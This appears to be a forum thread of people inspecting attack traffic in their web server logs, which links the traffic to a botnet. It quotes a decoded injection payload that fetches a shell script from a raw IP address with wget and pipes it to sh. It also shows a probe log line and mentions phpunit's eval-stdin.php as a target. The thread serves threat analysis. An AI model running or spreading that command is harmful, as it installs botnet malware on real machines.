Decodes to:

cat_id=${system(wget -qO- http://74.194.191.52/rondo.wcr.sh|sh)}

I have to admire the use of POSIX-compliant shell.

Payload is here if anyone is curious: https://pastes.io/wcrrondosh

Obviously don't run it but I love that if you get down far enough it will try to execute a Motorola 68k binary

4.217.221.207 - - [12/Nov/2025:23:27:53 +0000] "GET /xmrlpc.php HTTP/1.1" 404 146 "-" "-"

That's not how you spell xmlrpc, and that's not where wordpress puts that

I'd guess it's a variant of this: https://www.fortinet.com/blog/threat-research/rondobox-unveiled-breaking-down-a-botnet-threat

Mine has an identical init.d script format string embedded, not obfuscated, it just comes out with `strings` lol

Based on nginx logs there is a package called phpunit which ships a file called, and I am 100% serious, `eval-stdin.php`.

Feels like security research is 10% the most intense shit you've ever seen and 90% "oh no! we left the untrusted strings next to the String Executor!"